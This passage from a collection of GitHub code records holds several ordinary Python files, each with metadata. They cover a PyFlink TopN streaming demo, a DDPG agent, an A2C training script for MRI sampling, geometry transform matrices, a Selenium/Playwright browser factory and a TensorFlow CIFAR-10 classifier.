\\\n .set_value_only_deserializer(SimpleStringSchema()) \\\n .build()\n\n sensor_ds = env.from_source(\n source,\n WatermarkStrategy.for_bounded_out_of_orderness(Duration.of_seconds(3)).with_timestamp_assigner(\n KeyedProcessFunctionTopN()\n ),\n \"Kafka Source\"\n ).map(WSMapFunction())\n\n sensor_window_agg = sensor_ds.key_by(lambda sensor: sensor.id) \\\n .window(SlidingEventTimeWindows.of(Time.seconds(10), Time.seconds(5))) \\\n .aggregate(\n VcCountAgg(),\n WindowResult()\n )\n\n sensor_window_agg_ks = sensor_window_agg.key_by(lambda r: r[2])\n # sensor_window_agg_ks.print()\n sensor_window_agg_ks.process(TopN(2)).print()\n\n # sensor_ds.print()\n\n env.execute(\"KeyedProcessFunctionTopN\")\n\n\nif __name__ == '__main__':\n keyed_process_function_topN_demo()\n", "repo_name": "huanglaoxie0503/pyflink-basic-introduction", "sub_path": "process/keyed_process_function_topN.py", "file_name": "keyed_process_function_topN.py", "file_ext": "py", "file_size_in_byte": 4466, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pyflink.common.watermark_strategy.TimestampAssigner", "line_number": 16, "usage_type": "name"}, {"api_name": "model.water_sensor.WaterSensor", "line_number": 17, "usage_type": "name"}, {"api_name": "pyflink.datastream.AggregateFunction", "line_number": 21, "usage_type": "name"}, {"api_name": "pyflink.datastream.ProcessWindowFunction", "line_number": 35, "usage_type": "name"}, {"api_name": "pyflink.datastream.window.TimeWindow", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 46, "usage_type": "name"}, {"api_name": "pyflink.datastream.KeyedProcessFunction", "line_number": 53, "usage_type": "name"}, {"api_name": "pyflink.datastream.StreamExecutionEnvironment.get_execution_environment", "line_number": 87, "usage_type": "call"}, {"api_name": "pyflink.datastream.StreamExecutionEnvironment", "line_number": 87, "usage_type": "name"}, {"api_name": "pyflink.datastream.connectors.kafka.KafkaSource.builder", "line_number": 92, "usage_type": "call"}, {"api_name": "pyflink.datastream.connectors.kafka.KafkaSource", "line_number": 92, "usage_type": "name"}, {"api_name": "pyflink.datastream.connectors.kafka.KafkaOffsetsInitializer.latest", "line_number": 96, "usage_type": "call"}, {"api_name": "pyflink.datastream.connectors.kafka.KafkaOffsetsInitializer", "line_number": 96, "usage_type": "name"}, {"api_name": "pyflink.common.SimpleStringSchema", "line_number": 97, "usage_type": "call"}, {"api_name": "pyflink.common.WatermarkStrategy.for_bounded_out_of_orderness", "line_number": 102, "usage_type": "call"}, {"api_name": "pyflink.common.WatermarkStrategy", "line_number": 102, "usage_type": "name"}, {"api_name": "pyflink.common.Duration.of_seconds", "line_number": 102, "usage_type": "call"}, {"api_name": "pyflink.common.Duration", "line_number": 102, "usage_type": "name"}, {"api_name": "functions.func.WSMapFunction", "line_number": 106, "usage_type": "call"}, {"api_name": "pyflink.datastream.window.SlidingEventTimeWindows.of", "line_number": 109, "usage_type": "call"}, {"api_name": "pyflink.datastream.window.SlidingEventTimeWindows", "line_number": 109, "usage_type": "name"}, {"api_name": "pyflink.common.Time.seconds", "line_number": 109, "usage_type": "call"}, {"api_name": "pyflink.common.Time", "line_number": 109, "usage_type": "name"}]}
+{"seq_id": "22109718530", "text": "import torch.optim\nfrom torch.nn import MSELoss\nimport numpy as np\nimport copy\nfrom buffer import ReplayBuffer\nfrom model import Actor, Critic\n\n\nclass DDPGAgent:\n def __init__(self,\n dimS,\n dimA,\n gamma=0.99,\n actor_lr=1e-4,\n critic_lr=1e-3,\n tau=1e-3,\n sigma=0.1,\n hidden_size1=400,\n hidden_size2=300,\n buffer_size=int(1e6),\n batch_size=128,\n render=False):\n\n self.dimS = dimS\n self.dimA = dimA\n\n self.gamma = gamma\n self.pi_lr = actor_lr\n self.q_lr = critic_lr\n self.tau = tau\n self.sigma = sigma\n\n self.batch_size = batch_size\n # networks definition\n # pi : actor network, Q : critic network\n self.pi = Actor(dimS, dimA, hidden_size1, hidden_size2)\n self.Q = Critic(dimS, dimA, hidden_size1, hidden_size2)\n\n # target networks\n self.targ_pi = copy.deepcopy(self.pi)\n self.targ_Q = copy.deepcopy(self.Q)\n\n self.buffer = ReplayBuffer(dimS, dimA, limit=buffer_size)\n\n self.Q_optimizer = torch.optim.Adam(self.Q.parameters(), lr=self.q_lr)\n self.pi_optimizer = torch.optim.Adam(self.pi.parameters(), lr=self.pi_lr)\n\n self.render = render\n\n def target_update(self):\n # soft-update for both actors and critics\n # \\theta^\\prime = \\tau * \\theta + (1 - \\tau) * \\theta^\\prime\n for th, targ_th in zip(self.pi.parameters(), self.targ_pi.parameters()): # th : theta\n targ_th.data.copy_(self.tau * th.data + (1.0 - self.tau) * targ_th.data)\n\n for th, targ_th in zip(self.Q.parameters(), self.targ_Q.parameters()):\n targ_th.data.copy_(self.tau * th.data + (1.0 - self.tau) * targ_th.data)\n\n def get_action(self, state, eval=False):\n\n state = torch.tensor(state, dtype=torch.float)\n\n with torch.no_grad():\n action = self.pi(state)\n action = action.numpy()\n if not eval:\n # for exploration, we use a behavioral policy of the form\n # \\beta(s) = \\pi(s) + N(0, \\sigma^2)\n noise = self.sigma * np.random.randn(self.dimA)\n return action + noise\n else:\n return action\n\n def train(self):\n \"\"\"\n train actor-critic network using DDPG\n \"\"\"\n\n batch = self.buffer.sample_batch(batch_size=self.batch_size)\n\n # unroll batch\n observations = torch.tensor(batch['state'], dtype=torch.float)\n actions = torch.tensor(batch['action'], dtype=torch.float)\n rewards = torch.tensor(batch['reward'], dtype=torch.float)\n next_observations = torch.tensor(batch['next_state'], dtype=torch.float)\n terminal_flags = torch.tensor(batch['done'], dtype=torch.float)\n\n mask = torch.tensor([1.]) - terminal_flags\n\n # compute TD targets based on target networks\n # if done, set target value to reward\n\n target = rewards + self.gamma * mask * self.targ_Q(next_observations, self.targ_pi(next_observations))\n\n out = self.Q(observations, actions)\n loss_ftn = MSELoss()\n loss = loss_ftn(out, target)\n self.Q_optimizer.zero_grad()\n loss.backward()\n self.Q_optimizer.step()\n\n pi_loss = - torch.mean(self.Q(observations, self.pi(observations)))\n self.pi_optimizer.zero_grad()\n pi_loss.backward()\n self.pi_optimizer.step()\n\n self.target_update()\n\n def save_model(self, path):\n checkpoint_path = path + 'model.pth.tar'\n torch.save(\n {'actor': self.pi.state_dict(),\n 'critic': self.Q.state_dict(),\n 'target_actor': self.targ_pi.state_dict(),\n 'target_critic': self.targ_Q.state_dict(),\n 'actor_optimizer': self.pi_optimizer.state_dict(),\n 'critic_optimizer': self.Q_optimizer.state_dict()\n },\n checkpoint_path)\n\n return\n\n def load_model(self, path):\n checkpoint = torch.load(path)\n\n self.pi.load_state_dict(checkpoint['actor'])\n self.Q.load_state_dict(checkpoint['critic'])\n self.targ_pi.load_state_dict(checkpoint['target_actor'])\n self.targ_Q.load_state_dict(checkpoint['target_critic'])\n self.pi_optimizer.load_state_dict(checkpoint['actor_optimizer'])\n self.Q_optimizer.load_state_dict(checkpoint['critic_optimizer'])\n\n return\n\n\nif __name__ == '__main__':\n agent = DDPGAgent(3, 2, 1)\n print(agent.pi.state_dict())", "repo_name": "npex2020rl/rl", "sub_path": "day4/ddpg/ddpg_agent.py", "file_name": "ddpg_agent.py", "file_ext": "py", "file_size_in_byte": 4676, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "model.Actor", "line_number": 36, "usage_type": "call"}, {"api_name": "model.Critic", "line_number": 37, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 40, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 41, "usage_type": "call"}, {"api_name": "buffer.ReplayBuffer", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.optim.optim.Adam", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.optim.optim", "line_number": 45, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.optim.optim.Adam", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.optim.optim", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.optim.tensor", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.optim.float", "line_number": 61, "usage_type": "attribute"}, {"api_name": "torch.optim.no_grad", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.random.randn", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.optim.tensor", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.optim.float", "line_number": 82, "usage_type": "attribute"}, {"api_name": "torch.optim.tensor", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.optim.float", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.optim.tensor", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.optim.float", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.optim.tensor", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.optim.float", "line_number": 85, "usage_type": "attribute"}, {"api_name": "torch.optim.tensor", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.optim.float", "line_number": 86, "usage_type": "attribute"}, {"api_name": "torch.optim.tensor", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.nn.MSELoss", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.optim.mean", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.optim.save", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 111, "usage_type": "name"}, {"api_name": "torch.optim.load", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 124, "usage_type": "name"}]}
+{"seq_id": "4221665151", "text": "import argparse\nimport json\nimport random\nfrom matplotlib.style import use\nimport numpy as np\nimport torch\nimport os\nfrom activemri.envs.sparse_vecenvs import SparseVecEnv\nfrom activemri.feature_extractor import extractor\nfrom stable_baselines3.common import env_checker\nfrom stable_baselines3 import A2C\nimport matplotlib\nimport time\nmatplotlib.use('Agg')\n\ndef train(args):\n #####################\n #---- build env ----#\n #####################\n train_env = SparseVecEnv(args, mode='train')\n print('--- Successfully load environment ---\\n')\n print(\"Number of available actions:\", train_env.action_space.n)\n # env_checker.check_env(env)\n\n\n ##################\n #---- policy ----#\n ##################\n policy_kwargs = {\n 'net_arch': dict(), \n 'features_extractor_class': extractor.Extractor, \n 'features_extractor_kwargs': {'opts': args}, \n }\n \n #################\n #---- train ----#\n #################\n model = A2C(\n policy = 'MultiInputPolicy', \n env = train_env, \n learning_rate = args.lr, \n n_steps = args.update_timestep, \n gamma = args.gamma, \n use_rms_prop = args.use_rms_prop, \n gae_lambda = args.gae_lambda, \n ent_coef = args.entropy_coef, \n vf_coef = args.value_loss_coef, \n tensorboard_log = args.checkpoints_dir,\n policy_kwargs = policy_kwargs, \n device = args.device, \n verbose = 1, \n seed = args.random_seed, \n )\n model.policy.action_net = extractor.Action_net().to(model.device)\n print(model.policy)\n print('n_envs:', model.n_envs)\n # resume\n if args.training_dir:\n model.set_parameters(args.training_dir, device=model.device)\n\n # learn\n for i in range(10):\n model.learn(total_timesteps=args.num_train_steps, log_interval=100, reset_num_timesteps=(i==0))\n model.save(args.checkpoints_dir+f'/final_model_{model.num_timesteps}')\n \n \ndef set_random_seeds(args):\n random.seed(args.random_seed)\n np.random.seed(args.random_seed)\n torch.manual_seed(args.random_seed)\n \n\ndef build_args():\n parser = argparse.ArgumentParser(description='MRI Reconstruction Example')\n\n # env\n parser.add_argument(\"--env_type\", type=str, default='sparse')\n \n # MRI setting parameters\n parser.add_argument(\"--budget\", type=int, default=10)\n parser.add_argument(\"--accelerate\", type=int, default=4)\n parser.add_argument(\"--num_parallel_episodes\", type=int, default=4)\n parser.add_argument(\"--device\", type=str, default='cpu')\n parser.add_argument(\"--random_seed\", type=int, default=0)\n parser.add_argument(\"--training_dir\", type=str, default=None)\n parser.add_argument(\"--checkpoints_dir\", type=str, default=None)\n parser.add_argument(\n \"--reward_metric\",\n type=str,\n choices=[\"mse\", \"ssim\", \"nmse\", \"psnr\"],\n default=\"ssim\",\n )\n # parser.add_argument(\"--resume\", action=\"store_true\")\n \n # A2C training parameters\n parser.add_argument(\"--gamma\", type=float, default=0.5)\n parser.add_argument(\"--use_rms_prop\", type=int, choices=[0, 1], default=1)\n parser.add_argument(\"--lr\", type=float, default=0.0003)\n parser.add_argument(\"--gae_lambda\", type=float, default=0.95)\n parser.add_argument(\"--value_loss_coef\", type=float, default=0.5)\n parser.add_argument(\"--entropy_coef\", type=float, default=0.01)\n parser.add_argument(\"--update_timestep\", type=int, default=1000)\n parser.add_argument(\"--num_train_steps\", type=int, default=1000)\n parser.add_argument(\"--num_workers\", type=int, default=4)\n \n # model parameters\n parser.add_argument('--fc_size', default=256, type=int, help='Size (width) of fully connected layer(s).')\n parser.add_argument(\"--ppo_model_type\",type=str,default=\"pg_mri\")\n \n # Mask parameters\n parser.add_argument('--accelerations', nargs='+', default=[8], type=int,\n help='Ratio of k-space columns to be sampled. If multiple values are '\n 'provided, then one of those is chosen uniformly at random for '\n 'each volume.')\n parser.add_argument(\"--low_frequency_mask_ratio\", type=int, default=8)\n parser.add_argument(\"--apply_attrs_padding\", type=int, default=0, choices=[0, 1])\n \n # Reconstructor parameters\n parser.add_argument(\"--recon_model_checkpoint\", type=str, default='../pg_mri/reconstructor/model.pt')\n parser.add_argument(\"--in_chans\", type=int, default=1, choices=[1, 2])\n parser.add_argument(\"--out_chans\", type=int, default=1)\n parser.add_argument(\"--num_chans\", type=int, default=16)\n parser.add_argument(\"--num_pool_layers\", type=int, default=4)\n parser.add_argument(\"--drop_prob\", type=float, default=0.)\n \n # Data parameters\n parser.add_argument(\"--dataset\", type=str, default='knee')\n parser.add_argument(\"--_data_location\", type=str, default='../pg_mri/dataset/knee_singlecoil')\n parser.add_argument('--resolution', default=128, type=int, help='Resolution of images')\n parser.add_argument('--sample_rate', type=float, default=0.5,\n help='Fraction of total volumes to include')\n parser.add_argument('--center_volume', type=int, default=1, choices=[0, 1], \n help='If set, only the center slices of a volume will be included in the dataset. This '\n 'removes the most noisy images from the data.')\n parser.add_argument('--acquisition', default=None,\n help='Use only volumes acquired using the provided acquisition method. Options are: '\n 'CORPD_FBK, CORPDFS_FBK (fat-suppressed), and not provided (both used).')\n \n # Finish\n \n args = parser.parse_args()\n \n # transfer\n args.apply_attrs_padding = True if args.apply_attrs_padding else False\n args.budget = int(args.resolution/args.accelerate - int(args.resolution/args.low_frequency_mask_ratio))\n args.use_rms_prop = (args.use_rms_prop == 1)\n args.center_volume = (args.center_volume == 1)\n\n # save\n os.makedirs(args.checkpoints_dir, exist_ok=True)\n with open(args.checkpoints_dir+'/commandline_args.txt', 'w') as f:\n json.dump(args.__dict__, f, indent=2)\n \n return args\n\nif __name__ == \"__main__\":\n args = build_args()\n set_random_seeds(args)\n torch.set_num_threads(args.num_workers)\n train(args)", "repo_name": "yangpuPKU/L2SR-Learning-to-Sample-and-Reconstruct", "sub_path": "train_sparse.py", "file_name": "train_sparse.py", "file_ext": "py", "file_size_in_byte": 6437, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.use", "line_number": 14, "usage_type": "call"}, {"api_name": "activemri.envs.sparse_vecenvs.SparseVecEnv", "line_number": 20, "usage_type": "call"}, {"api_name": "activemri.feature_extractor.extractor.Extractor", "line_number": 31, "usage_type": "attribute"}, {"api_name": "activemri.feature_extractor.extractor", "line_number": 31, "usage_type": "name"}, {"api_name": "stable_baselines3.A2C", "line_number": 38, "usage_type": "call"}, {"api_name": "activemri.feature_extractor.extractor.Action_net", "line_number": 54, "usage_type": "call"}, {"api_name": "activemri.feature_extractor.extractor", "line_number": 54, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 70, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 74, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 150, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.set_num_threads", "line_number": 159, "usage_type": "call"}]}
+{"seq_id": "10287168699", "text": "\"\"\"\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import division\n\nfrom math import cos\nfrom math import sin\n\nfrom compas.geometry import normalize_vector\nfrom compas.geometry import multiply_matrices\n\n\n__author__ = ['Tom Van Mele ',\n 'Andrew Liew ']\n__copyright__ = 'Copyright 2016, Block Research Group - ETH Zurich'\n__license__ = 'MIT License'\n__email__ = 'vanmelet@ethz.ch'\n\n\n__all__ = [\n 'translation_matrix',\n 'rotation_matrix',\n 'scale_matrix',\n 'shear_matrix',\n 'projection_matrix'\n]\n\n\n# notes:\n# - add object oriented interface\n# - quaternions?\n# - quaternion math?\n# - functions to apply transformations\n# - homogenization\n# - dehomogenization\n# - Matrix.apply\n# - Matrix.factory\n# - ...\n\n\ndef translation_matrix(direction):\n \"\"\"Creates a translation matrix to translate vectors.\n\n Parameters:\n direction (list): The x, y and z components of the translation.\n\n Returns:\n list: The (4 x 4) translation matrix.\n\n Homogeneous vectors are used, i.e. vector [x, y, z].T is represented as\n [x, y, z, 1].T. Matrix multiplication of the translation matrix with the\n homogeneous vector will return the new translated vector.\n\n Examples:\n >>> T = translation_matrix([1, 2, 3])\n [[1 0 0 1]\n [0 1 0 2]\n [0 0 1 3]\n [0 0 0 1]]\n \"\"\"\n return [[1.0, 0.0, 0.0, direction[0]],\n [0.0, 1.0, 0.0, direction[1]],\n [0.0, 0.0, 1.0, direction[2]],\n [0.0, 0.0, 0.0, 1.0]]\n\n\ndef rotation_matrix(angle, direction, point=None):\n \"\"\"Creates a rotation matrix for rotating vectors around an axis.\n\n Parameters:\n angle (float): Angle in radians to rotate by.\n direction (list): The x, y and z components of the rotation axis.\n\n Returns:\n list: The (3 x 3) rotation matrix.\n\n Rotates a vector around a given axis (the axis will be unitised), the\n rotation is based on the right hand rule, i.e. anti-clockwise when the axis\n of rotation points towards the observer.\n\n Examples:\n >>> R = rotation_matrix(angle=pi/2, direction=[0, 0, 1])\n [[ 6.12-17 -1.00+00 0.00+00]\n [ 1.00+00 6.12-17 0.00+00]\n [ 0.00+00 0.00+00 1.00+00]]\n \"\"\"\n # To perform a rotation around an arbitrary line (i.e. an axis not through\n # the origin) an origin other than (0, 0, 0) may be provided for the\n # direction vector. Note that the returned 'rotation matrix' is then\n # composed of three translations and a rotation: Tp-1 Txy-1 Tz-1 R Tz Txy Tp\n # l = sum(direction[i] ** 2 for i in range(3)) ** 0.5\n # u = [direction[i] / l for i in range(3)]\n x, y, z = normalize_vector(direction)\n c = cos(angle)\n t = 1 - c\n s = sin(angle)\n R = [\n [t * x * x + c , t * x * y - s * z, t * x * z + s * y, 0.0],\n [t * x * y + s * z, t * y * y + c , t * y * z - s * x, 0.0],\n [t * x * z - s * y, t * y * z + s * x, t * z * z + c , 0.0],\n [0.0 , 0.0 , 0.0 , 1.0]\n ]\n\n if point is None:\n return R\n\n T1 = translation_matrix([-p for p in point])\n T2 = translation_matrix(point)\n\n return multiply_matrices(T2, multiply_matrices(R, T1))\n\n\ndef scale_matrix(x, y=None, z=None):\n \"\"\"Creates a scale matrix to scale vectors.\n\n Parameters:\n factor (float): Uniform scale factor for the x, y and z components.\n\n Returns:\n list: The (3 x 3) scale matrix.\n\n The scale matrix is a (3 x 3) matrix with the scale factor along all of the\n three diagonal elements, used to scale a vector.\n\n Examples:\n >>> S = scale_matrix(2)\n [[2 0 0]\n [0 2 0]\n [0 0 2]]\n \"\"\"\n if y is None:\n y = x\n if z is None:\n z = x\n return [[x, 0.0, 0.0, 0.0],\n [0.0, y, 0.0, 0.0],\n [0.0, 0.0, z, 0.0],\n [0.0, 0.0, 0.0, 1.0]]\n\n\ndef shear_matrix():\n pass\n\n\ndef projection_matrix():\n raise NotImplementedError\n\n\n# ==============================================================================\n# Debugging\n# ==============================================================================\n\nif __name__ == \"__main__\":\n pass\n", "repo_name": "garciadelcastillo/DynamoCompas", "sub_path": "package/DynamoCompas/bin/compas/geometry/xforms.py", "file_name": "xforms.py", "file_ext": "py", "file_size_in_byte": 4262, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "compas.geometry.normalize_vector", "line_number": 93, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 94, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 96, "usage_type": "call"}, {"api_name": "compas.geometry.multiply_matrices", "line_number": 110, "usage_type": "call"}]}
+{"seq_id": "7727856984", "text": "from playwright.sync_api import sync_playwright, Playwright, Page\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.firefox.webdriver import WebDriver\nfrom selenium.webdriver.ie.service import Service\nfrom selenium.webdriver.ie.webdriver import WebDriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\nfrom webdriver_manager.microsoft import IEDriverManager\n\n\nclass WebDriverFactory:\n _driver: WebDriver = None\n _driver: Page = None\n _playwright_browser: Playwright = None\n\n def open_browser(self, browserName):\n if browserName == \"chrome\":\n _driver = webdriver.Chrome(ChromeDriverManager().install())\n elif browserName == \"firefox\":\n _driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n elif browserName == \"ie\":\n _driver = webdriver.Ie(service=Service(IEDriverManager().install()))\n else:\n print('Browser type not found - ' + browserName)\n raise Exception('Browser type not found - ' + browserName)\n self._driver = _driver\n self._driver.maximize_window()\n self._driver.delete_all_cookies()\n return self._driver\n\n def close_browser(self):\n self._driver.close()\n\n def open_play_wright_browser(self, browserName):\n print(\"Entering open_playwright_browser\")\n if browserName == \"chrome\":\n playwright_browser = sync_playwright().start()\n browser = playwright_browser.chromium.launch(headless=False, slow_mo=50)\n driver = browser.new_page()\n\n elif browserName == \"firefox\":\n playwright_browser = sync_playwright().start()\n playwright_browser.firefox.launch(headless=False, slow_mo=50)\n driver = playwright_browser.new_page()\n elif browserName == \"ie\":\n playwright_browser = sync_playwright().start()\n playwright_browser.chromium.launch(headless=False, slow_mo=50)\n driver = playwright_browser.new_page()\n else:\n print('Browser type not found - ' + browserName)\n raise Exception('Browser type not found - ' + browserName)\n self._driver = driver\n\n def close_play_wight_browser(self):\n self._driver.close()\n self._playwright_browser.stop()\n", "repo_name": "prsnth89/PythonBehaveTest", "sub_path": "main/clientfactory/webdriver_factory.py", "file_name": "webdriver_factory.py", "file_ext": "py", "file_size_in_byte": 2402, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "selenium.webdriver.ie.webdriver.WebDriver", "line_number": 13, "usage_type": "name"}, {"api_name": "playwright.sync_api.Page", "line_number": 14, "usage_type": "name"}, {"api_name": "playwright.sync_api.Playwright", "line_number": 15, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 19, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 19, "usage_type": "name"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 19, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 21, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 21, "usage_type": "name"}, {"api_name": "webdriver_manager.firefox.GeckoDriverManager", "line_number": 21, "usage_type": "call"}, {"api_name": "selenium.webdriver.Ie", "line_number": 23, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 23, "usage_type": "name"}, {"api_name": "selenium.webdriver.ie.service.Service", "line_number": 23, "usage_type": "call"}, {"api_name": "webdriver_manager.microsoft.IEDriverManager", "line_number": 23, "usage_type": "call"}, {"api_name": "playwright.sync_api.sync_playwright", "line_number": 38, "usage_type": "call"}, {"api_name": "playwright.sync_api.sync_playwright", "line_number": 43, "usage_type": "call"}, {"api_name": "playwright.sync_api.sync_playwright", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "9514780946", "text": "import tensorflow as tf\nimport random\nimport numpy as np\nfrom keras.datasets import cifar10\n\ntf.set_random_seed(777)\n\n# CIFAR_10은 3채널로 구성된 32*32 이미지 60000장을 갖는다.\nIMG_CHANNELS = 3\nIMG_ROWS = 32\nIMG_COLS = 32\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\nx = tf.placeholder(tf.float32, [None, IMG_ROWS, IMG_COLS, IMG_CHANNELS])\ny = tf.placeholder(tf.int32, [None, 1])\n\ny_one_hot = tf.one_hot(y, 10)\ny_one_hot = tf.reshape(y_one_hot, [-1, 10])\n\nw1 = tf.Variable(tf.random_normal([3, 3, IMG_CHANNELS, 32]))\nlayer1 = tf.nn.conv2d(x, w1, strides=[1, 1, 1, 1], padding='SAME')\nlayer1 = tf.nn.relu(layer1)\nlayer1 = tf.nn.max_pool(layer1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\nw2 = tf.Variable(tf.random_normal([3, 3, 32, 64]))\nlayer2 = tf.nn.conv2d(layer1, w2, strides=[1, 1, 1, 1], padding='SAME')\nlayer2 = tf.nn.relu(layer2)\n\nw3 = tf.Variable(tf.random_normal([3, 3, 64, 128]))\nlayer3 = tf.nn.conv2d(layer2, w3, strides=[1, 1, 1, 1], padding='SAME')\nlayer3 = tf.nn.relu(layer3)\n\nflat = tf.reshape(layer3, [-1, 16 * 16 * 128])\n\nw = tf.get_variable('w', shape=[16 * 16 * 128, 10],\n initializer=tf.contrib.layers.xavier_initializer())\nb = tf.Variable(tf.random_normal([10]))\nlogits = tf.matmul(flat, w) + b\n\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=y_one_hot))\noptimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n\n\ndef next_batch(num, data, labels):\n '''\n `num` 개수 만큼의 랜덤한 샘플들과 레이블들을 리턴합니다.\n '''\n idx = np.arange(0 , len(data))\n np.random.shuffle(idx)\n idx = idx[:num]\n data_shuffle = [data[i] for i in idx]\n labels_shuffle = [labels[i] for i in idx]\n\n return np.asarray(data_shuffle), np.asarray(labels_shuffle)\n\n\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\ntraining_epochs = 10\nbatch_size = 100\nnum_examples = len(x_train)\nfor epoch in range(training_epochs):\n avg_cost = 0\n total_batch = int(x_train.shape[0] / batch_size) # batch_size\n\n for i in range(total_batch):\n batch_xs, batch_ys = next_batch(batch_size, x_train, y_train)\n\n feed_dict = {x: batch_xs, y: batch_ys}\n c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)\n avg_cost += c / total_batch\n \n print('Epoch: ', '%04d' % (epoch + 1), 'cost = ', '{:9f}'.format(avg_cost))\n\n\n# Test model and check accuracy\ncorrect_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(y_one_hot, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nprint('Accuracy: ', sess.run(accuracy, feed_dict={x: x_test, y: y_test}))\n\n# Get one and predict\nr = random.randint(0, len(x_test) - 1)\n# print('Label: ', sess.run(tf.argmax(x_test[r:r + 1], 1)))\nprint('Prediction: ', sess.run(tf.argmax(logits, 1), feed_dict={x: x_test[r:r + 1]}))\n", "repo_name": "jamiedotpro/etc", "sub_path": "tf/tf19_cifar10.py", "file_name": "tf19_cifar10.py", "file_ext": "py", "file_size_in_byte": 2999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "tensorflow.set_random_seed", "line_number": 6, "usage_type": "call"}, {"api_name": "keras.datasets.cifar10.load_data", "line_number": 13, "usage_type": "call"}, {"api_name": "keras.datasets.cifar10", "line_number": 13, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tensorflow.one_hot", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.nn.conv2d", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.max_pool", "line_number": 27, "usage_type": "call"}, {"api_name": 